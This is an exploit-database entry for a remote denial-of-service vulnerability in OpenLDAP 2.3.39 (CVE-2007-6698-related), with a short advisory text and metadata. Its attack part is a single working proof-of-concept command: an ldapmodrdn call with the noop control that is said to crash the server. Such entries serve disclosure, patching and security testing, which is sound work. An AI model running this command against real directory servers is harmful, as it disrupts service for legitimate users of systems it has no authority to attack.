OpenLDAP 2.3.39 - MODRDN Remote Denial of Service

Author: Ralf Haferkamp
type: dos
platform: multiple
port: 389.0
date_added: 2009-11-08  
date_updated:   
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 10077.txt  

Attackers use readily available LDAP commands to exploit this issue.



source: https://www.securityfocus.com/bid/27778/info

OpenLDAP is prone to a remote denial-of-service vulnerability.

Attackers can exploit this issue to deny service to legitimate users.

OpenLDAP 2.3.39 is vulnerable to this issue; other versions may also be affected.

This issue is related to one described in BID 26245 (OpenLDAP Multiple Remote Denial of Service Vulnerabilities), identified by CVE-2007-6698.

ldapmodrdn -x -h :389 -D <dn> -w <pw> -e \noop ou=test,dc=my-domain,dc=com ou=test2